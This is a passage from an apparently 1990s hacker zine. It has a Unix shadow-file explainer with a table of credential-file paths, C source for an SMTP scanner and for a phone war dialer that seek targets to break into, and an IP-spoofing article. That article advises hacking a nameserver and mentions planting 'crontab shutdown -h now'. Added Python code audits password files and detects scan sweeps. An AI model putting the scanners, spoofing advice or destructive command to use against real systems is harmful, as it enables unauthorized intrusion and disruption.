readable only by root and save themselves a lot of hassle. But programs need
to read certain info from that file (user name, uid, gid, etc.), and since
not all programs are run as root, making /etc/passwd readable by root only
would cause conflicts: a lot of programs would have to be run as root, which
would create a lot of security problems. So the actual encrypted password is
held in the shadow file (for a list of locations see below). This file
is / should be readable and writable only by the root admins. This gives an
extra amount of security: since only root can read it, normal users can't
grab a copy and crack the passwords in it. The format of the shadow file
goes as :

username:password:change_date:min_change:max_change:warn:inactive:expire:

the format will go into more detail in the next section.

-[ ---------------------------------------------------------------------- ]-
Û²±° The Shadow File : The Format °±²Û
-[ ---------------------------------------------------------------------- ]-

As stated above the format of the shadow file goes as :

username:password:change_date:min_change:max_change:warn:inactive:expire:

User Name      : the name of the user
Password       : the encrypted password, and/or alternate authentication
                 methods, which will be explained in the next section.

[ - the following fields relate to passwd change / expiration - ]

Change Date    : encodes the date of the most recent password change
Min/Max Change : tells the min and max days between password changes
Warn           : when the password is about to expire, warn that many
                 days ahead of time
Inactive       : specifies how many days the user has to change their pass
                 after the expiration date before that account is cancelled
Expire         : encodes the date that the password will expire


-[ ---------------------------------------------------------------------- ]-
Û²±° The Shadow File : Extra Features °±²Û
-[ ---------------------------------------------------------------------- ]-

( I read some of this stuff in a document relating to linux security so I am
not sure if it applies to all shadowing systems but I am pretty sure that
it does / or at least should. If not it is still something that is
interesting to know. )

In the password field of the shadow file you can also specify additional
authentication programs to be run after the password has been entered. An
example of one is :

shypht:4j3jx70735;@/sbin/agetest::::::

the ;@/sbin/agetest would tell the system that after the password has been
entered correctly to run the /sbin/agetest program, which I just made up
for an example, and it would return a 0 or 1 showing if the user passed
shypht:<\@>/sbin/securelogin::::::

which the user would have to pass to gain entry to the system,
and he/she would not be prompted for a password. This can be used for lower
or higher security on a system, but I would imagine that it would only be
used to secure the system even more, you could have them prompted for
personal questions which only they would know etc.
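
A defender's reading of the two file formats described above, as an added
example (not from Shypht's text): it flags /etc/passwd entries whose hash is
still world-readable or empty, splits a shadow line into the fields listed,
and pulls out any ;@program hooks so their permissions can be checked. Lines
marked "constructed" are not from the article; treating the date fields as
day counts and "x" as a second shadow marker are assumptions.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

# "*" is the marker shown in the article; "x" is assumed as a second one.
SHADOW_MARKERS = {"*", "x"}

PASSWD_SAMPLE = """\
esmith:s920Vk02sl24:6151:100:Edmond Smith:/home/esmith:/bin/bash
jdoe:*:6152:100:J Doe (constructed):/home/jdoe:/bin/bash
guest::6153:100:Guest (constructed):/tmp:/bin/sh
"""

# Constructed aging values: changed on day 10000, max 90, warn 7, inactive 14.
SHADOW_SAMPLE = "esmith:s920Vk02sl24:10000:0:90:7:14::"
# The article's own example of an extra authentication program.
SHADOW_HOOK_SAMPLE = "shypht:4j3jx70735;@/sbin/agetest::::::"


def audit_passwd(text: str) -> List[Tuple[str, str]]:
    """Return (login, finding) for every entry a shadowed system should not have."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((fields[0], "malformed entry"))
        elif fields[1] == "":
            findings.append((fields[0], "empty password"))
        elif fields[1] not in SHADOW_MARKERS:
            findings.append((fields[0], "hash readable in passwd"))
    return findings


@dataclass
class ShadowEntry:
    username: str
    password: str
    change_date: Optional[int]
    min_change: Optional[int]
    max_change: Optional[int]
    warn: Optional[int]
    inactive: Optional[int]
    expire: Optional[int]


def parse_shadow(line: str) -> ShadowEntry:
    """username:password:change_date:min_change:max_change:warn:inactive:expire:"""
    fields = line.strip().split(":")
    if len(fields) < 8:
        raise ValueError("expected 8 shadow fields, got %d" % len(fields))
    numbers = [int(f) if f else None for f in fields[2:8]]
    return ShadowEntry(fields[0], fields[1], *numbers)


def auth_programs(entry: ShadowEntry) -> List[str]:
    """Programs named with ;@ in the password field, as the article describes."""
    return [part[1:] for part in entry.password.split(";") if part.startswith("@")]


def password_state(entry: ShadowEntry, today: int) -> str:
    """Classify an entry; `today` uses the same day count as the date fields."""
    if entry.expire is not None and today >= entry.expire:
        return "expired"
    if entry.change_date is None or entry.max_change is None:
        return "no aging"
    age = today - entry.change_date
    if age > entry.max_change:
        if entry.inactive is not None and age > entry.max_change + entry.inactive:
            return "disabled"
        return "must change"
    if age >= entry.max_change - (entry.warn or 0):
        return "warn"
    return "ok"


if __name__ == "__main__":
    for login, finding in audit_passwd(PASSWD_SAMPLE):
        print(login, "->", finding)
    entry = parse_shadow(SHADOW_SAMPLE)
    for day in (10050, 10085, 10095, 10105):
        print("day", day, "->", password_state(entry, day))
    print(auth_programs(parse_shadow(SHADOW_HOOK_SAMPLE)))
```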

-[ ---------------------------------------------------------------------- ]-
Û²±° The Shadow File : Locations °±²Û
-[ ---------------------------------------------------------------------- ]-

The location of the shadow file varies from system to system. I have taken
this list from the ultimate beginners guide to hacking 97 revision and
modified it for this document.

UNIX Path
-------------------------------------------------
AIX 3 /etc/security/passwd or /tcb/auth/files//
A/UX 3.0s /tcb/files/auth/?/*
BSD4.3-Reno /etc/master.passwd
ConvexOS 10 /etc/shadpw
ConvexOS 11 /etc/shadow
DG/UX /etc/tcb/aa/user/
EP/IX /etc/shadow
HP-UX /.secure/etc/passwd
IRIX 5 /etc/shadow
Linux1.1 /etc/shadow
OSF/1 /etc/passwd[.dir|.pag]
SCO Unix #.2.x /tcb/auth/files//
SunOS4.1+c2 /etc/security/passwd.adjunct
SunOS 5.0 /etc/shadow
System V Release 4.0 /etc/shadow
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag]
UNICOS /etc/udb
Unix System V /etc/master.passwd

-[ ---------------------------------------------------------------------- ]-
Û²±° Closing Comments °±²Û
-[ ---------------------------------------------------------------------- ]-

I hope that this document is helpful to anyone out there. I wrote this to
help people understand, and maybe learn a bit more about the shadow file.
Thanks for reading this far - shypht

-[ ---------------------------------------------------------------------- ]-
Û²±° The End °±²Û
-[ ---------------------------------------------------------------------- ]-
greetz out to : vacuum, cellular fear, philisopher, exorcist, atom, RM,
severed, all my friends in #hackphreak, PentiumRU, Nyangel,
Rloxley, X-Bish and all the other ops, and #carparts and
anyone else I forgot

thanx to vacuum for fixin some spelling and adding the 1way hash info.

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
SMTP server scanner
by memor

/*

Here is a SMTP server scanner (thoses ones on port25)
to scan i guess for old mailserver, for easy sendmail bugs uses.

well.. this is not really an hacking tool.. only a scanning one.
it can be used in 2 ways..

USAGE:
smtpscan -dh xxx.xxx[.xxx](if option -h) [port](optional)

first.. to find "possible" hackable domains like that :
smtpscan -d xxx.xxx or smtpscan -d xxx.xxx 25
will scan for smtp from xxx.xxx.1.1 to xxx.xxx.255.1

and 2ndly, it can be used to find "possible" hackable servers on
a domain with :
smtpscan -h xxx.xxx.xxx or smtpscan -h xxx.xxx.xxx 25
will scan for smtp from xxx.xxx.xxx.1 to xxx.xxx.xxx.255

*note*
you can scan for any domains or servers with another port (like for pop3 or
other) with smtpscan -dh xxx.xxx.xxx[.xxx] port
thanx to Wintifax for his advices ;)

memor@mygale.org

memor(hbs) Aug 29, 1997
*/


/* habitual includes for managing functions in the programm */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <netinet/in.h>

/* defining global variables for reading writing creating the socket */

FILE *soc;
int sock;

/* defining void answer(void) function */

void answer();

/* main routing */

int main(argc,argv)
int argc;
char **argv;
{

/* create variables for counting , ip adress string */

int count, port = 25;
char *ips;
struct sockaddr_in ip;
ips = (char *)malloc(100);

/* checking if enough arguments to make the programm working correctly */

if(argc<2)
{
/* if not, tells the usage and quit */

printf("%s - memor/hbs\n",argv[0]);
printf("usage:\n");
printf("%s -dh xxx.xxx[.xxx] [port]\n",argv[0]);
exit(1);
}
else if(argc>3) port = atoi(argv[3]);

/* beginning -d or -h scan */

for(count=1;count<256;count++)
{
/* snprintf() keeps a long argv[2] from overflowing the 100-byte ips buffer */
if(strcmp(argv[1],"-d")==0) snprintf(ips,100,"%s.%i.1",argv[2],count);
else snprintf(ips,100,"%s.%i",argv[2],count);
printf("Looking at %s Port %i\n",ips,port);

/* creating socket */

if ( (sock = socket(AF_INET, SOCK_STREAM, 0)) < 0 ) /* i cant open it */
{
/* i cant, i write what error it gives me */
perror("socket");
} else {
soc=fdopen(sock, "r");
ip.sin_family = AF_INET;
ip.sin_port = htons(port);
ip.sin_addr.s_addr = inet_addr(ips);
bzero(&(ip.sin_zero),8);

/* trying to connect..reach the host */

if ( connect(sock, (struct sockaddr *)&ip, sizeof(struct sockaddr)) < 0 )
{
/* i cant, i write what error it gives me */
perror("connect");
} else {

/* getting what the smtp tells me */

answer();

}

/* closing that socket */
close(sock);
}
}
}

/* answering function */

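void answer()
{
    /* getc() returns an int so that EOF can be told apart from a character */
    int ch;
    do
    {
        ch=getc(soc);
        if(ch==EOF) break; /* the server closed the connection or the read failed */
        printf("%c",ch);
        /* i write the character i received */
    }
    while(ch!='\r');
    /* received a 13 (or EOF) .. go back to main() */
    printf("\n");
}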
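
Added example (not part of memor's program): the header comment above describes two sweep shapes, -h walking the last octet of one /24 and -d walking the third octet with the last octet fixed at 1. The Python code below looks for both shapes in connection records; the log format, addresses, thresholds and function names are constructed for the example.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed log format for this example:
#   "<ISO time> SRC=<ip> DST=<ip> DPT=<port>"
LINE_RE = re.compile(
    r"^(\S+) SRC=(\d+\.\d+\.\d+\.\d+) DST=(\d+)\.(\d+)\.(\d+)\.(\d+) DPT=(\d+)$")


def parse(lines):
    """Yield (time, source, (a, b, c, d), port) for every well-formed record."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue                      # not a connection record
        try:
            ts = datetime.fromisoformat(m.group(1))
        except ValueError:
            continue                      # unreadable timestamp
        a, b, c, d, port = (int(g) for g in m.groups()[2:])
        yield ts, m.group(2), (a, b, c, d), port


def max_distinct_in_window(events, window):
    """events: sorted (time, value) pairs. Largest number of distinct values
    seen inside any span of length `window`."""
    counts, best, lo = Counter(), 0, 0
    for ts, val in events:
        counts[val] += 1
        while ts - events[lo][0] > window:
            old = events[lo][1]
            counts[old] -= 1
            if not counts[old]:
                del counts[old]
            lo += 1
        best = max(best, len(counts))
    return best


def find_sweeps(lines, min_targets=16, window=timedelta(minutes=10)):
    """Return sorted (source, port, kind, scope, distinct_targets) findings."""
    groups = defaultdict(list)
    for ts, src, (a, b, c, d), port in parse(lines):
        # "-h" shape: a.b.c fixed, last octet walks 1..255
        groups[(src, port, "host-sweep", f"{a}.{b}.{c}.0/24")].append((ts, d))
        # "-d" shape: a.b fixed, third octet walks 1..255, last octet constant
        groups[(src, port, "net-sweep", f"{a}.{b}.x.{d}")].append((ts, c))
    findings = []
    for (src, port, kind, scope), events in groups.items():
        events.sort()
        hit = max_distinct_in_window(events, window)
        if hit >= min_targets:
            findings.append((src, port, kind, scope, hit))
    return sorted(findings)


def sample_log():
    """Constructed records: two sweeps and one busy but legitimate relay."""
    t0 = datetime(1997, 8, 29, 2, 0, 0)
    rows = []
    for i in range(1, 41):     # 203.0.113.7 walks 192.0.2.1 .. 192.0.2.40
        rows.append((t0 + timedelta(seconds=3 * i), "203.0.113.7", f"192.0.2.{i}"))
    for i in range(1, 31):     # 198.51.100.9 walks 10.20.1.1 .. 10.20.30.1
        rows.append((t0 + timedelta(seconds=5 * i), "198.51.100.9", f"10.20.{i}.1"))
    for i in range(50):        # a relay delivering to one server, repeatedly
        rows.append((t0 + timedelta(seconds=7 * i), "198.51.100.50", "192.0.2.10"))
    rows.sort()
    return [f"{ts.isoformat()} SRC={src} DST={dst} DPT=25" for ts, src, dst in rows]


if __name__ == "__main__":
    for finding in find_sweeps(sample_log()):
        print(finding)
```

smtpscan blocks in connect() on every address that does not answer, so a real sweep can be far slower than the constructed one; size the window to that timeout rather than to the banner read.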

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
All About The Internet Protocol
by Malhavoc

Let's start off with the basics of IPs, then we will move on to some of the
advanced stuff like IP spoofing and masquerading.

First off, IP is short for Internet Protocol. The Internet Protocol defines
how data should be broken down to be transmitted over the internet. Another
part of the Internet Protocol is the Internet Protocol address, or IP address.
The IP address is a 32-bit number written as 4 numbers ranging from 0 to 255.
The IP address is similar to your home address in that it is an identifier,
except that the IP address identifies each computer connected or linked to
the internet.

IP addresses can be resolved to domain names and vice versa through DNS, which
stands for Domain Name Server, or name server for short. Each domain has a
unique IP address assigned to it. An IP can have multiple domain names
assigned to it.

The IP address also has 4 layers associated with it. They are:

The Application Layer - This deals with the functions of server
applications like FTP and HTTP.

The Transmission Control Protocol Layer - This controls the moving of data
from the source to the destination ignoring everything else.

The Internet Protocol Layer - This handles all of the moving data from one
network node to the next.

The Physical Layer - This controls all of the actual communications
hardware such as ethernet cards and modems.


These layers are known as the protocol stack.
Without IPs you can't find any computer on the internet. Something else
associated with the IP is something called TCP, or Transmission Control
Protocol. This basically controls what the IP transmits and receives to
and from other computers.

There are also 2 types of IPs. They are the dynamic and the static IP.
The dynamic IP is an IP that always changes. Sometimes the last 2 digits
are the same, but most of the time the last digit stays the same. The
static IP, on the other hand, is the same all of the time, hence the word
static.

As you can see, the IP has many functions throughout the internet, and if
you mess around with them in the wrong way, you could certainly screw up many
computers, even a whole network.
How do you do this you ask? READ ON!

In the previous paragraph I said that if you fuck around with an IP or a
computer that is connected to a very large LAN, Network, or Intranet you
could really screw things up quite a bit. There are many ways of doing
this. Some more fun than others. You could hack a system and crontab
shutdown -h now to run every 15 minutes or nuke a server and lag it to
hell, but that could totally cripple a system, and that is not what I like
to condone. What I really like is spoofing. Although it does not screw up
anything it can give you unauthorized access to things or you could just
make your ip and/or domain to whatever you want. Spoofing is not very
hard if you know what you are doing. If you read my explanation of the IP
it explained all about IPs. If you remember everything that I explained
it can help you in your quest to spoof, or you could continue to read this
and learn how to spoof by my teachings.

To do a basic spoof on IRC or something you just need root on a
nameserver and jizz. In case you are saying, "What the hell is a
nameserver?", I have included a quick little definition, if you will, of a
nameserver.

A nameserver is pretty much a computer that translates the
alphabetic domain name to a numerical IP address.

To get root on a nameserver you either have to:
a) Get unauthorized access to the system, in other words hack the system
b) You already own a nameserver connected to the internet

If you would like to use option "a" to get access, you need to find
another file specifically written about hacking(which I am positive I will
write at some point).

or if you chose "b", can I get access?(it was a joke but if i can, e-mail
me at malhavoc@xxedgexx.com) but seriously if you do have one, perfect.
All you need to do now is download jizz. You could download it at my
website at Http://Kaos.xxedgexx.com or go to Http://www.rootshell.com.
Once you download it type gcc -o jizz jizz.c, after that, jizz should
compile in the directory you download to. After the compilation is
complete type ./jizz

Manually Spoofing - The more advanced way to spoof
and for use with people that actually know something.



ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
ShokDial - a linux war dialer
by Shok

I wrote this because someone asked me to, and it's the only war
dialer I've seen for linux. I don't like or use war dialers but I decided
to write it anyway....oh well.

This is new, so it may have a few bugs but it shouldn't have any. If you
see a bug or anything, please let me know (mail me at shok@sekurity.org).

WHAT YOU NEED TO DO:
--------------------

***YOU NEED TO DO THIS***.........

In wardialer.c, at the very top..you will have three #define's you need to
change to your modem, etc.

#define MODEMPORT "/dev/cua1"

This is the COM my modem is on. You NEED to set this to yours.
If your modem is on COM1 (assuming you're using linux), then put /dev/cua0
instead of /dev/cua1.

However if you are using something like IRIX for example it is not
/dev/cua1 (if I recall)...and you'll need to set this to
your modem port.

--------------------

There is also:
#define HANGUPPORT "/dev/ttyS1"

You NEED to change this as well, if you put cua0 earlier, put ttyS0
here...if you put cua1 put ttyS1 here.....etc

However if you have IRIX or something like that it will be
different.....

---------------------

Now all you have to do (and this is optional), there is:
#define TIMEOUT 30

You just set this to how long you will wait for it to try to dial a number
and this will disconnect after so long.

Type shokdial -h for help/options...

Enjoy!


Serial programming for unix.....boy this stuff is fun. Well unix
is famous for its special files. The modem is just a file you can open(),
read(), and write() to...for that reason this program can be used on all
unixes. The only thing different that needs to be changed, is the
#define MODEMPORT "/dev/cua1", because most unix/unix clones have their
own modem port. For example /dev/ttyS? which is COM1 (to the DOS users),
would be /dev/ttym? in IRIX. Now once this program opens the modem (via
device/special file) for reading/writing, it will write() to it, and send
it standard modem instructions like +++ATH, ATZ etc....this comes before
any dialing to get the modem ready....we also use a function to check for
"OK" so we know that all is well. On receiving this, then enter the number
we want to dial into a character buffer, append a "\r" to it (so it
actually sends the command), we then write(fd (the file desc. for
/dev/cua1), thebufwiththenum, strlen(thebufwiththenum)); Now once you do
this..you can't write "+++ATH" to it, because it will send that as the
login name (assuming you've connected to a host), so what I did, was I
opened the other modem port (there are two, /dev/cua0 and /dev/ttyS0 are
essentially the same thing (both COM1 to explain it easier), one is used
for dialing out (cua?) and one is used for dialling in and out (ttyS?). So
I opened up the other port and used that to send the command to hang up.
But all the other stuff isn't complex, they are all C primitive
instructions like ScanMin++; which would increase ScanMin by 1, repeat a
while loop, and then the next strcat(phonenum, ScanMin); ... would dial
the next number......you get the idea. That's about all there really is to
say about the technical stuff about it.

Oh yeah one thing.....when it connects, it looks for the string
"CONNECT" returned from the modem serial file. You won't get this message
from faxes as you will only get this message when the connection is
complete, so this will only return *** CONNECT *** if it was a modem. It
will both output to the screen and logfile *** CONNECT *** to
1-xxx-xxx-xxxx. You can use local or long distance, although international
numbers haven't been added at this time (not hard to do just didn't care
to add an extra scanf and an extra CountryCode variable ;)

About ShokDial (its temp name for now)
---------------------------------------

This supports random scanning (pseudorandom to be honest, heh) and
sequential (the range you specified and up) scanning. You can give it a
range too but that still falls under sequential scanning. To use random
scanning use 'shokdial -r', otherwise it will by default use sequential
scanning. For the other options type 'shokdial -h'. You want to keep track
of the version because I'd almost guarantee this program is going to
continue changing. I need to add some ncurses GUI effects (heh) and a
function to resume scanning for those of you who are too lazy to even look
at the (by default) wardialer.log and get the last number it dialed
(assuming you used sequential scanning) and entering that as the Scan
number to begin on!

It will output to wardialer.log and on to the screen. If you have
BEEP = WANTBEEP in the Makefile, it will beep when it connects to a host.
That's about all I really have to say about it. I don't actually use war
dialers (really), so I haven't actually tested this (sorry if there are
any problems but there shouldn't be)....if you do however find a problem,
please let me know! I will fix it and send out a patched version.....you
can get all of them from ftp.janova.org or www.janova.org. Enjoy ;)

Shok


To Do:

- Add a resume function

- Any good ideas/features that should be added? Mail me at
shok@sekurity.org if you think of something useful
(don't mention a GUI or anything though anyway).

-------------
Makefile:
------------

CC = gcc
#CC = cc

CFLAGS =
#CFLAGS = -g

BEEP = WANTBEEP
#BEEP = NOWANTBEEP

#---------------------------------

all: shokdial

shokdial: shokdial.c errors.c validate.c
	$(CC) $(CFLAGS) -D$(BEEP) -o shokdial shokdial.c errors.c validate.c


----------
shokdial.c
----------

/* ShokDial */
/* This is (I have never seen one anyway, I apologize if I'm wrong) */
/* the first war dialer that I've ever seen for unix. This will */
/* compile on most/all unixs' (I didn't use any spiffy or complex */
/* functions). */
/* Enjoy, */
/* --==+*~(Shok)~*+==-- */

#include <termios.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <errno.h>
#include <fcntl.h>
#include <ctype.h>
#include <signal.h>

#define ERROR -1
#define LOGFILE "wardial.log" /* Used as default for logging */
/* unless you change this define */
/* or specify it as an option */

#define TIMEOUT 25 /* YOU WANT TO CONFIGURE THIS!!! */
/* This is how long it will wait until it */
/* gives up. */

/* You can do: */
/* ln -s /dev/cua1 /dev/modem */
/* or change this to /dev/cua1 (or whatever your COM is) */
/* cua0 = COM1 cua1 = COM2 */

#define MODEMPORT "/dev/cua1"

/* Same as above..... */
/* ttyS0 = COM1 ttyS1 = COM2 */

#define HANGUPPORT "/dev/ttyS1"


/* Global variables */
/* ---------------- */
int fd; /* fd for modem */
int numbytes; /* To verify that all the bytes were written */
int random; /* Use random scanning if this is set */
char *ProgName; /* Um duh. */
char LocalOrLong[2]; /* Dialing long distance of local */
int First3Digits; /* Such as "555" of 555-XXXX */
/* However this also serves as the area code */
/* for a long distance number */
int Last3Digits; /* Used as XXX-555-XXXX */
int ScanMin; /* Number to scan from....like 0000 and up */
int ScanMax; /* Stop scanning when this number is reached */
char *LogFile; /* Where to log connections */
char buf[512]; /* Buffer for strings returned by modem */
FILE *logfile; /* for the log file */
/* FILE *resume; */ /* To resume scanning where left off */

struct termios options; /* Baud rate, modes, etc. */


/* Function prototypes */
/* ------------------- */
void usage(void); /* Help/usage */
void version(void); /* Display version */
void intro(void); /* An introduction */
void get_num(void); /* Get phone number and scan prefix */
void get_scannum(void); /* Get range to scan */
void open_port(void); /* Open modem port for dialing */
void set_options(void); /* Set baud rate, termios, etc. */
void init_modem(void); /* Initialize the modem */
void dial_number(void); /* Dial the number */
void hangup(void); /* Hang up modem. */
void sighandler(int signum); /* Used when signals are received */

/* Check read/write/opens for errors */
void check_for_error(int fd, int num, char *s);

/* Check if the phone num was valid */
void local_validnum(int digits);
void long_validnum(int firstdigits, int lastdigits);


void main(int argc, char **argv)
{
struct sigaction sig, sigdef;

system("clear");

/* ------------------------------------------------- */

ProgName = argv[0];

if (argc == 2) {
if ((strcasecmp(argv[1], "-r")) == 0) random = 1;
else if ((strcasecmp(argv[1], "-h")) == 0) usage();
else if ((strcasecmp(argv[1], "-help")) == 0) usage();
else if ((strcasecmp(argv[1], "--help")) == 0) usage();
else if ((strcasecmp(argv[1], "-v")) == 0) version();
else if ((strcasecmp(argv[1], "--version")) == 0) version();
else LogFile=argv[1];
}

else if (argc == 3) {
if ((strcasecmp(argv[1], "-r")) == 0) {
random = 1;
LogFile=argv[2];
}
else usage();
}

else if (argc > 3) usage();

else {
fprintf(stderr, "No log file specified....using %s as log file.\n", LOGFILE);
fprintf(stderr, "-r (random scanning) option not given, using sequential scanning instead.\n");
LogFile=LOGFILE;
}

/* -------------------------------------------------- */

sleep(4);
system("clear"); /* Clear the screen */


/* -------------------------------------------------- */

sig.sa_handler = sighandler;
sigdef.sa_handler = SIG_IGN;
sigemptyset (&sig.sa_mask);
sig.sa_flags = 0;

sigaction(SIGHUP, NULL, &sigdef);
sigaction(SIGINT, &sig, NULL);
sigaction(SIGTERM, &sig, NULL);

/* -------------------------------------------------- */

logfile=fopen(LogFile, "a");
/* resume=fopen(".resume", "w"); */

intro();

if (random != 1) {
get_num(); /* Get the phone number */
get_scannum(); /* Get the range to scan (the parentheses make this a call) */
}
open_port(); /* Open MODEMPORT (by default /dev/cua1) */
set_options(); /* Set baud rate, terminal modes, etc. */
init_modem(); /* Send the modem ATZ etc.. */

dial_number(); /* Dial the number/do the scanning */
hangup(); /* Disconnect */

close(fd);
}

/* -------------------------------------------------- */

void version(void)
{
fprintf(stderr, "This is ShokDial, v1.0...please keep notice of this.\n");
fprintf(stderr, "in case this program under goes some new features etc.\n");
fprintf(stderr, "\t\t--==+*~(Shok)~*+==--\n");
exit(0);
}

/* -------------------------------------------------- */

void usage(void)
{
fprintf(stderr, "Usage: %s [options] [logfile]\n", ProgName);
fprintf(stderr, "Options:\n");
fprintf(stderr, "-r for random (as opposed to sequential) scanning\n");
fprintf(stderr, "-h for help....what you're seeing now\n");
fprintf(stderr, "-v for the version...because this will probably undergo changes\n\n");
fprintf(stderr, "If no log file is specified, \"%s\" is used.\n", LOGFILE);
exit(0);
}

/* -------------------------------------------------- */

void intro(void)
{
printf("Shok's war dialer for UNIX (affectionately known as ShokDial).....\n");
printf("------------------------------------------------------------------\n");
printf("This is still in the beta version so it doesn't have a nice\n");
printf("graphical interface yet.\n");
printf("\nWell what you do here, is enter 0000 for the range to begin\n");
printf("scanning and 9999 to end scanning if you want to scan all the\n");
printf("possible ranges, but you can put 4444 for the nmber to start\n");
printf("and 5555 for the number to begin to scan XXX-[4444-5555] for\n");
printf("local numbers and it would be 1-XXX-XXX-[4444-5555] for long\n");
printf("distance.\n");
printf("\nAlso, you can use random scanning (as opposed to sequential\n");
printf("scanning) by specifying the \"-r\" option...type:\n");
printf("%s -h for help.\n\n", ProgName);
printf("Anyway..enjoy!\n");
printf("\t\t\t--==+*~(Shok)~*+==--\n\n");

printf("Hit any key to continue.\n");
getchar();
}

/* -------------------------------------------------- */

void get_num(void)
{

printf("Scanning..\n(L)ocal, Long (D)istance\n");
scanf("%1s", LocalOrLong); /* LocalOrLong[2] holds one character plus the NUL */

if((strncasecmp(LocalOrLong, "L", 1)) == 0) {
printf("Enter number to dial (753 for 753-XXXX): ");
scanf("%d", &First3Digits);
local_validnum(First3Digits);

}
else if ((strncasecmp(LocalOrLong, "D", 1)) == 0) {
printf("Enter number to dial (555555 for 555-555-XXXX): ");
scanf("%3d%3d", &First3Digits, &Last3Digits);
long_validnum(First3Digits, Last3Digits);

}
else {
fprintf(stderr, "You must specify L for local or D for Long Distance\n");
exit(ERROR);
}

}

/* -------------------------------------------------- */

void get_scannum(void)
{
printf("Enter number to start scanning at: ");
scanf("%4d", &ScanMin);
putchar('\n');

if ((ScanMin >= 0) && (ScanMin <= 9999)) { /* Do nothing */
}
else {
fprintf(stderr, "%d is invalid.\nScanning range must be 0000-9999\n", ScanMin);
exit(ERROR);
}

printf("Enter number to end scanning: ");
scanf("%4d", &ScanMax);
putchar('\n');

if ((ScanMax > ScanMin) && (ScanMax > 0) && (ScanMax <= 9999)) {
/* Do nothing */
}
else {
fprintf(stderr, "%d is invalid.\nScanning range must be 0000-9999\n", ScanMax);
exit(ERROR);
}

}

/* -------------------------------------------------- */

void open_port(void)
{
printf("Opening modem for dialing...\n");
fd = open(MODEMPORT, O_RDWR | O_NOCTTY | O_NDELAY);
if (fd == ERROR) {
perror("open");
exit(ERROR);
}

}

/* -------------------------------------------------- */

void set_options(void)
{
tcgetattr(fd, &options);

options.c_cflag |= (CLOCAL | CREAD);
options.c_cflag &= ~PARENB;
options.c_cflag &= ~CSTOPB;
options.c_cflag &= ~CSIZE;
options.c_cflag |= CS8;

options.c_iflag |= (INPCK | ISTRIP);
options.c_lflag &= ~(ICANON | ECHO | ISIG);
options.c_oflag &= ~OPOST;

cfsetispeed(&options, B115200);
cfsetospeed(&options, B115200);

tcsetattr(fd, TCSANOW, &options);
}

/* -------------------------------------------------- */

void init_modem(void)
{
printf("Initializing modem (port %s)....\n", MODEMPORT);

/* Hang up modem if it's already on */

hangup();

numbytes=write(fd, "ATZ\r", 4);
check_for_error(fd, numbytes, "write");

sleep(3);

}

/* -------------------------------------------------- */

void dial_number(void)
{

char phonenum[20]; /* If local: phonenum = First3Digits + ScanMin */
/* If long distance: phonenum = */
/* First3Digits + Last3Digits + ScanMin */
char phonenum1[20]; /* Same as above except this has "\r" as well */
char connectmsg[50]; /* the message to the log file */

printf("Giving a %d second connection timeout\n", TIMEOUT); /* TIMEOUT is an int */


if ((strncasecmp(LocalOrLong, "L", 1)) == 0) { /* Local call */

while (1) {

if (random == 1) ScanMin = (rand() % 8889) + 1111;

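/* First3Digits and ScanMin are ints, so they are formatted into the */
/* buffer; casting an int to char * makes strcat() read a bogus address */
snprintf(phonenum, sizeof(phonenum), "%d%04d", First3Digits, ScanMin);
snprintf(phonenum1, sizeof(phonenum1), "%s\r", phonenum);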

if (random != 1) {
printf("Dialing %d-%d.\n", First3Digits, ScanMin);
numbytes = write(fd, phonenum1, strlen(phonenum1));
check_for_error(fd, numbytes, "write");
}

else { /* if random == 1 */
printf("Dialing %d-%d.\n", First3Digits, ScanMin);
numbytes = write(fd, phonenum1, strlen(phonenum1));
check_for_error(fd, numbytes, "write");
}

sleep(TIMEOUT); /* How long to wait for timeout */

numbytes = read(fd, buf, 511);
check_for_error(fd, numbytes, "read");

/* Compare the string with "CONNECT" */
if((strncmp(buf, "CONNECT", 7)) == 0) {
#ifdef WANTBEEP
fputc('\a', stderr);
#endif
fprintf(stderr, "*** CONNECT *** to %d-%d\n", First3Digits, ScanMin);

/* Log it */
sprintf(connectmsg, "*** CONNECT *** to %d-%d\n", First3Digits, ScanMin);
fputs(connectmsg, logfile);

bzero(connectmsg, 50); /* Clear the message */
}

bzero(buf, 512); /* Reset buffer */

hangup();

if (random != 1) {

/* Increase ScanMin so it scans for the next number */
ScanMin += 1;

if (ScanMin > ScanMax) {
fputc('\a', stderr);
fprintf(stderr, "ALL DONE SCANNING....THANKS FOR USING\n");
exit(0);
}

}

bzero(phonenum, 20); /* Clear the phone number */
bzero(phonenum1, 20); /* Ditto */

} /* End of while loop */
} /* End of if */

else { /* if LocalOrLong == "D" (Long Distance call) */

while(1) {

if (random == 1) ScanMin = (rand() % 8889) + 1111;

/* 1 + area code + next three digits + 4-digit number, formatted from */
/* the ints; casting an int to char * makes strcat() read a bogus address */
snprintf(phonenum, sizeof(phonenum), "1%d%d%04d",
First3Digits, Last3Digits, ScanMin); /* 1-XXX-XXX-0000 */
snprintf(phonenum1, sizeof(phonenum1), "%s\r", phonenum); /* Copy it to another */
/* buf with "\r" appended */

if (random != 1) {
